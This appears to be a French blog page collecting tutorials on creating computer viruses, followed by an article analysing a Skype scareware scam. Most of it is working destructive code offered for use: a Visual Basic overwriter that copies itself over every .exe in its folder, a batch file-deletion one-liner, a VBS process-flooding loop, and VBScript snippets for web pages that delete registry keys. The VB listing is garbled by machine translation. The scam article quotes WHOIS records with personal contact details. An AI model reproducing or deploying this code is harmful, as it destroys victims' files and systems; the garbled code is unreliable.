أكتب نوع البرنامج بالفرنسية مفتاح لعروسي / RECHERCHER BLG

Affichage des articles dont le libellé est Virus. Afficher tous les articles
Affichage des articles dont le libellé est Virus. Afficher tous les articles

lundi 15 juillet 2013

Créer un virus - partie 2/2

images Les virus informatiques sont sous de nombreuses formes avec de nombreuses fonctions différentes. Certains sont plutôt simplistes et peuvent être détectés par l'utilisateur moyen tandis que d'autres sont complexes et passent inaperçus pendant un certain temps. Les virus les plus courants relevant de la classification des infecteurs de fichiers, qui fonctionnent en infectant des fichiers exécutables. Ils y parviennent en insérant leur code malveillant dans une zone du fichier d'origine, lui permettant d'être exécutée chaque fois que le fichier est accessible Certains d'entre eux sont capables de complètement écraser un fichier, ce qui rend tout un programme inutile.
 
C’est le cas de ce type de virus que nous allons voir aujourd’hui. Les virus Overwritters.
Je sais que les virus overwritters , n'ont malheureusement plus aucune chance de se propager et ils ne sont pas "intelligent". Malgré tout cela overwritters peut vous aider à comprendre les bases du VRAI virus. Je vais vous donner le code d'abord et ensuite on va le passer en revue.
-=-=-=-=-=-=-=-=-=- Couper ici-=-=-=-=-=-=-=-=- =-=-=
 
 Option Explicit Option Explicit
 Dim myarray() As Byte myarray Dim () As Byte
 Dim victim As String victime Dim As String
 Const mysize As Integer = 11776 mysize Const As Integer = 11776
 
 Private Sub Form_Load() Private Sub Form_Load ()
 On Error Resume Next On Error Resume Next
 Dim Free Dim gratuit
 Free = FreeFile Free = FreeFile
 
 Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free Open App.Path & "\" & & App.EXEName ". Exe" pour l'accès binaire Lire Comme # Free
 ReDim myarray(mysize) ReDim MonTableau (mysize)
 Get #1, 1, myarray Obtenez myarray # 1, 1,
 Close #Free Close # Free
 
 victim = Dir(App.Path & "\" & "*.EXE") victime = Dir (App.Path & "\" & "*. exe")
 While victim <> "" Bien que victime <> ""
 
 Open App.Path & "\" & victim For Binary Access Write As #Free Open App.Path & "\" & victime pour l'accès binaire Ecrivez comme # Free
 Put #1, , myarray Put # 1,, myarray
 Put #1, , mysize Put # 1,, mysize
 Close #Free Close # Free
 
 victim = Dir() victime = Dir ()
 
 Wend Wend
 
 End End
 End Sub End Sub
  -=-=-=-=-=-=-=-=-=- Couper ici-=-=-=-=-=-=-=-=- =-=-=
 
Décodons tout cela : (miam ! J)
 Option Explicit Option Explicit
 Dim myarray() As Byte myarray Dim () As Byte
 Dim victim As String victime Dim As String
 Const mysize As Integer = 11776 mysize Const As Integer = 11776
Ici, nous définissons les variables que nous allons utiliser, le "myarray ()" variable qui contient le code binaire du virus, "victime" est la variable qui contient le nom du fichier de la victime et le "mysize" variable contient la taille du virus.
 Private Sub Form_Load() Private Sub Form_Load ()
 On Error Resume Next On Error Resume Next
Nous ouvrons le sous dossier que nous allons utiliser (Form_Load), et nous avons mis notre erreur poignée c'est-à-dire qu’en cas d’erreur le programme s’arrêtera là.
 Dim Free Dim gratuit
 Free = FreeFile Free = FreeFile
C'est une bonne idée de prendre exemple sur le virus y2k. Cela vous débarrasse de la lecture / écriture des erreurs, car il est open source.
 Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free Open App.Path & "\" & & App.EXEName ". Exe" pour l'accès binaire Lire Comme # Free
 ReDim myarray(mysize) ReDim MonTableau (mysize)
 Get #1, 1, myarray Obtenez myarray # 1, 1,
 Close #Free Close # Free
Maintenant, nous allons sortir le code binaire de nos virus et nous allons le stocker dans la variable "myarray".
 victim = Dir(App.Path & "\" & "*.EXE") victime = Dir (App.Path & "\" & "*. exe")
 While victim <> "" Bien que victime <> ""
 
 Open App.Path & "\" & victim For Binary Access Write As #Free Open App.Path & "\" & victime pour l'accès binaire Ecrivez comme # Free
 Put #1, , myarray Put # 1,, myarray
 Put #1, , mysize Put # 1,, mysize
 Close #Free Close # Free
Ici, nous définissons la variable « victime » et nous avons mis notre code binaire dans le programme de la victime.
 victim = Dir() victime = Dir ()
 
 Wend Wend
Puis nous avons mis la victime à zéro, et nous répétons l'ensemble du processus d'infecter tous les fichiers. Exe dans le répertoire courant.
 End End
 End Sub End Sub
Et enfin, nous fermons le programme et les sous dossiers.

Créer un virus - partie 1/2

images.jpg
Bonjour à tous.
Aujourd’hui j’ai choisi de parler à propos des virus, on entend beaucoup parler, on a tous été infecter un jour ou l’autre par ces programmes. Parce que avant tous un virus est un programme.
Nous allons donc voir comment ça fonctionne mais aussi comment en créer ; bien sur !
Dans cette première partie, nous allons commencer avec des virus plutôt simple vous allez le voir :
Les Virus VB (Visual Basic):
Ce type de virus sont les plus anciens et ont été parmi les premiers à être apparus.
 
 
Créer un petit virus pas très méchant...

Avant toute chose je tiens a vous avertir que cette article n'est là que dans un but pédagogique, et vous n'étes nullement incités à reprtoduire ceci sur votre pc. Vous etes donc résponsable de vos actes et ni moi ni mon hébérgeur ne seons tenu pour responsable.

Nous allons apprendre à créer un petit virus en *bat. :

C’est partit :

Pour commencer, ouvrez votre editeur de texte prèfèré (ex : bloc-note). Ensuite, tapes sans sauter de ligne :


del C :windows*.bmp cls



Après, enrigistrer le code avec l’extension *.bat

Attention
: N’ouvrez en aucun cas le fichier sur votre ordinateur, le virus s’exécutera !


 Comment ça marche, explications:

del C:windows*.bmp

del : sert à supprimer
C:windows : situe le dossier où la commande doit avoir lieu
* : suivit d'une extension désigne tous les dossiers portant cette extension dans l'exemple l'extension est *.bmp .Donc ce mini virus supprimera tous les fichiers portant l'extension *.bmp (en locurrence des images) se trouvant dans windows.
 
Ce virus pourrait être plus dangereux si vous changiez l’extension en une autre plus importante, mais la, je laisse libre choix à votre imagination !^^
 

Créer un virus plus méchant…
 


vous rêvez de savoir planter des pc très facilement ?^^

C’est partit :

Commencez, par ouvrir votre editeur de text.
Ensuite, tapes le code suivant :


Set variable = CreateObject("WScript.Shell")
Do
variable.run "notepad",false
Loop


Après, enregistrez le avec le nom que vous voulez, avec l’extension .vbs


Petite précision :

Ici, le bloc-note (celui de windows) représente l'application désirée, vous pouvez la remplacer par une application plus lourde (pour des résultats plus rapides et meilleurs).
false : signifie que les fenêtres ne doivent pas être initialisées, seulement les processus pour que la victime ne se rende pas compte.
Loop : signifie que ça doit se faire en boucle : ça doit lancer le bloc-note, recommencé et ainsi de suite.
 
Ces virus ont été créé en Visual Basic, si vous voulez aller plus loin dans la création de virus apprenez le Visual Basic (qui est un langage de programmation plutôt simple)
Dans la deuxième partie du cours nous verrons des échantillons de vrais virus bien méchant !
Si vous voulez un bon tuto : "Apprendre le Visual basic simplement" laissez des coms.

virus batch

Les virus BATCH
Pour ceux qui ont consulté le dossier hacking, vous l'aurez compris, pour hacker il faut avant tout une bonne expérience en programmation !

Ce qui n'est pas le cas pour la programmation des virus BATCH portant l'extension *.bat, et c'est bien là tout le problème !
Ces virus sont d'une simplicité déconcertante, peuvent être tout ce qu'il y a de plus dangereux et sont imperceptibles par les antivirus, FireWall (pare-feu), etc !

C'est donc pour cela que vous ne trouverez pas ici comment créer votre premier virus *.bat mais vous apprendrez à les découvrir, à en mesurer leur puissance et à savoir vous en protéger...

Tout d'abord, qui sont-ils et comment sont-ils créés ?

Un virus *.bat est programmé en DOS ! Le DOS, seigneur du Windows, est un langage relativement simple pour de courtes applications au sein de l'environnement Windows. En une ligne de 2 mots de DOS, on peut reformater un PC ! Il utilise l'environnement Windows et peut tout reproduire, il est le coeur de Windows.
Voici donc ce que l'on peut faire avec DOS, tout et même plus que vous ne pouvez faire vous-même sur votre PC !
Un programme BATCH est une suite d'exécutions ms-DOS. Il ne se compose que d'ordres qui s'exécutent les un aprés les autres.

Comment créer un virus *.bat ?

Pour créer un tel fichier, rien de plus simple ! Il vous suffit d'ouvrir le bloc-note de Windows (win+R > "Notepad" > OK) et de rentrer les ordres.
Ensuite, vous faites Enregistrer et vous entrez un nom sous la syntaxe *.bat !

Vous avez créé un fichier BATCH qui exécutera un à un les ordres que vous aurez inscrit lorsque l'on essaiera de l'exécuter !

Mais que sont exactement ces ordres ?

En voilà une question qu'elle est bonne ! Comme je l'ai dis plus haut, je ne donnerais pas directement ici les ordres qui pourraient être mal utilisés mais seulement quelques exemples.
Un fichier *.bat destiné à servir de virus commence toujours par la ligne @echo off. Afficher cette dernière en en-tête permet de rendre l'exécution du script invisible, les tâches ne sont pas affichées à l'écran.
C'est ensuite une série d'appel de fonctions qui s'exécutent.

Par exemple, ce code affiche le texte "Coucou", marque une pause en demandant à "l'utilisateur" de presser une touche et crée un dossier "Salut" sur le bureau :
@echo off
echo Coucou
pause
mkdir C:\Documents+and+Settings\UTILISATEUR\Bureau\Salut

Le DOS utilise l'invite de commande,
c'est donc à travers elle que s'executeront les commandes :

L'invite de commande

Pour atteindre l'invite de commande, faîtes win+R > "cmd" > OK.

Pour pirater, détruire un PC, DOS ne propose bien entendu pas des fonctions exprés ! Ce sont en fait des fonctions anodines que vous utilisez tous les jours qui serviront à faire fumer votre PC. Par exemple, une création toute simple de dossier ! Imaginez que vous ordonniez 1 000 000 de créations de dossiers sur le PC ! Celui-ci sature, le disque dur fume et le PC est naze, c'est pas plus compliqué que ça :) ! Bien entendu, on peut aussi très bien faire reformater le disque choisi ce qui permet une perte totale des données du PC...

D'autres solutions existent comme la destruction du dossier WINDOWS ou des fichiers *.dll ce qui provoque une perte totale du controle de la machine.
Ce qui nous expliquent pourquoi les antivirus ne les détectent pas ! En réalité, ils les voient mais ne les considérent pas comme des virus ! Hé oui, utilisant les fonctions de Windows, on ne peut pas se permettre de les désactiver ! Il faudrait alors désactiver la fonction de création de fichier, de suppression etc ce qui est inconcevable !

Les virus se présentent donc sous forme de petits fichiers systèmes portant l'extension *.bat.
Mais ce n'est pas aussi simple :) ! On peut effectivement très facilement insérer un virus de cette sorte dans un fichier Word à l'extension *.doc. Lorsque que le fichier est ouvert, le code est exécuté par Word, le virus est donc activé !

Donc, seule la vigilance compte, n'ouvrez pas n'importe quoi, vous êtes le meilleur antivirus qui soit !

Le principe des virus BATCH est à présent un peu démystifié, vous connaissez maintenant les possibilités de vos ennemis et vous savez donc mieux comment reconnaitre un virus *.bat.

Je ne peux pas en dire plus, mais si vous réusissez à créer votre premier virus, soyez en fier si vous le désirez mais dîtes-vous aussi que c'est le dernier.
Si vous y êtes arrivé, c'est que vous avez des chances d'être un passionné d'informatique, alors pensez que c'est vraiment con de détruire ce que l'on aime...
Ceci dit, on peut aussi très bien s'amuser sur un copain sans ne rien faire de mal ... c'est autre chose :) !
Une création de virus est passible de plusieurs années de prison et d'une amende probablement au dessus de votre bourse.

Outre les fichiers BATCH, de nombreux supports sont utilisés pour programmer des virus comme les ActiveX, le Visual Basic, les virus en *.com, etc ! Ceux-ci permettent notament de s'exécuter au travers d'une page HTML, de modifier le registre, etc !
Mais cela fera l'objet d'un autre article...

Bonne chance ;) !

samedi 21 avril 2012

! Mettre un virus dans une page HTML


Avec un simple code à mettre entre la balise <BODY> Et </BODY> d'une page HTML
N'importe qui peut insérer un code HTML ( Vbasic ) pour effacer la base de registre, désinstaller de le disque dure, renommer l'ordinateur .... etc
Voici les codes à insérer !

Pour supprimer les programmes qui se lancent au démarrage:

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegDelete"HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run"
</script>


Pour renommer le nom de l'ordinateur:

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegDelete"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\"
WshShell.RegWrite"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ComputerName\"t'es mort"
</script>


Pour désinstaller l'imprimante, scanner:

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegDelete"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Printer\"
</script>


Pour désinstaller le clavier:

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegDelete"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Keyboard\"
</script>


Pour désinstaller le modem:

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegDelete"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Modem\"
</script>


Pour désinstaller l'écran:

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegDelete"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Monitor\"
</script>


Pour désinstaller le disque dure:

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegDelete"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\PCMIA\"
</script>


Pour désinstaller les pilotes de la souris:

<script Language="VBscript">
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegDelete"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Mouse\"
</script>

Du spam sur Skype


Du spam sur Skype 



Il y a quelques minutes j’ai reçu directement dans mon client Skype un message d’un interlocuteur qui n’est pas dans ma liste de contacts. Le message contient un texte assez classique pour inciter l’utilisateur à mettre à jour son ordinateur suite à une infection supposée:
Le message incite aussi à rajouter cet utilisateur parmi ses contacts.
Son pseudo dans mon cas: instruction.upd.6 et le lien proposé pour « réparer » mon système d’exploitation « www.updatetn.com ». Le client que j’utilise est le client Skype pour Linux qui n’est malheureusement pas particulièrement tenu à jour par la société qui le développe et qui est toujours en version « bêta ».
Ce nom de domaine a été enregistré le 26 février 2011 (aujourd’hui) par un certain Mario Lipak en République Tchèque grâce aux services de la société Enom:
Domain Name: UPDATETN.COM
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: DNS1.NAME-SERVICES.COM
Name Server: DNS2.NAME-SERVICES.COM
Name Server: DNS3.NAME-SERVICES.COM
Name Server: DNS4.NAME-SERVICES.COM
Name Server: DNS5.NAME-SERVICES.COM
Status: clientTransferProhibited
Updated Date: 26-feb-2011
Creation Date: 26-feb-2011
Expiration Date: 26-feb-2012
>>> Last update of whois database: Sat, 26 Feb 2011 12:58:30 UTC <<<
[...]
Registration Service Provided By: Unpicked.com
Contact: support@unpicked.com
Visit: http://www.unpicked.com
Domain name: updatetn.com
Registrant Contact:
-
Mario Lipak ()
Fax:
Haria 55
Referral URL:www.unpicked.com
Prague, CZ 44300
CZ
Administrative Contact:
-
Mario Lipak (mariolipak@gmail.com)
+420.2495614
Fax: +420.2495614
Haria 55
Referral URL:www.unpicked.com
Prague, CZ 44300
CZ
Technical Contact:
-
Mario Lipak (mariolipak@gmail.com)
+420.2495614
Fax: +420.2495614
Haria 55
Referral URL:www.unpicked.com
Prague, CZ 44300
CZ
Status: Locked
Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com
Creation date: 26 Feb 2011 07:33:00
Expiration date: 26 Feb 2012 02:33:00
[...]
Mise à jour 14:00
En fonction de la façon dont on se connecte à ce site, le visiteur est redirigé vers une page PHP particulière. Celle-ci contient des informations vous faisant croire que votre ordinateur a été infecté (et qui dans ce cas est fabriquée pour ressembler à une fenêtre classique de Windows) :
et charge aussi cette boîte d’avertissement:
Enfin, si vous cliquez sur l’un des messages, vous êtes redirigé vers un site d’achat en ligne http://secureonlinestore.net/… soit un nom de domaine qui ressemble au précédent par son parcours d’enregistrement, mais qui est référencé auprès d’un client habitant en Lituanie:
Domain Name: SECUREONLINESTORE.NET
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: DNS1.NAME-SERVICES.COM
Name Server: DNS2.NAME-SERVICES.COM
Name Server: DNS3.NAME-SERVICES.COM
Name Server: DNS4.NAME-SERVICES.COM
Name Server: DNS5.NAME-SERVICES.COM
Status: clientTransferProhibited
Updated Date: 04-feb-2011
Creation Date: 04-feb-2011
Expiration Date: 04-feb-2012
>>> Last update of whois database: Sat, 26 Feb 2011 13:32:20 UTC <<<
[...]
Registration Service Provided By: Unpicked.com
Contact: support@unpicked.com
Visit: http://www.unpicked.com
Domain name: secureonlinestore.net
Registrant Contact:
SecureOnlineStore Inc.
Andrew Bradley ()
Fax:
53/54, Latviu st
Referral URL:www.unpicked.com
Vilnius, LI 2600
LT
Administrative Contact:
SecureOnlineStore Inc.
Andrew Bradley (abradley@asia.com)
37052725555
Fax: 37052725555
53/54, Latviu st
Referral URL:www.unpicked.com
Vilnius, LI 2600
LT
Technical Contact:
SecureOnlineStore Inc.
Andrew Bradley (abradley@asia.com)
37052725555
Fax: 37052725555
53/54, Latviu st
Referral URL:www.unpicked.com
Vilnius, LI 2600
LT
Status: Locked
Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com
Creation date: 04 Feb 2011 10:22:00
Expiration date: 04 Feb 2012 05:22:00
Et en réalité ce site ouvre une fenêtre (IFRAME) sur un site de commerce électronique beaucoup plus
recommandable
 connu (Swreg/Digital River), pour le produit « Computer Repair service – Virus/Spyware & Malware Removal – Instant Online Repair » et un mondant de €15.29 (ou $ 19.95) avec une référence d’affiliation particulière (affil5777) qui doit être la référence de celui qui a diffusé ce spam via Skype.
Il s’agit évidemment de nous vendre du vent… Peut-être la suite nous en dira plus sur quel est le commerçant un peu douteux derrière ce stratagème.

En guise de première conclusion quelques conseils

  • Méfiez-vous des inconnus qui vous contactent sur vos logiciels de messagerie instantanée
  • Ne cliquez pas sur un lien sans être certain de sa provenance et de la volonté de celui qui vous l’envoie de le partager.
  • Utilisez les fonctions de vos logiciels de messagerie instantanée permettant de bloquer ou de signaler en comme émetteur de spam un contact malveillant.
  • Ne faites jamais confiance aux sites Web qui vous signalent que votre ordinateur est contaminé par des dizaines de logiciels malveillants.
  • N’installez ou n’achetez que des logiciels de sécurité (antivirus, antispyware, etc…) pour lesquels vous avez lu des recommandations provenant de publications sérieuses.
Mise à jour 17:40
En faisant quelques recherches sur le nom de ce service ou logiciel « Computer Repair service – Virus/Spyware & Malware Removal – Instant Online Repair » on tombe sur un nombre de sites qui se ressemblent dans leur fonctionnalité, mais pas forcément dans leur mise en page ou leur contenu. A chaque fois il s’agit de vous offrir un service d’assistance en ligne pour réparer votre PC en cas d’incident, dont certains correspondent à ce prix de $ 19.95. Ces services sont-ils sérieux ? Certains semblent exister depuis longtemps, d’autres depuis très peu de temps.
Dans le cas qui nous préoccupe on est directement amené sur une page de paiement, sans explication sur la nature ou du service proposé. Arnaque en vue donc!

 
Penanggung Jawab Miftah Budi Kurniawan | Supported by Cheat Game 4U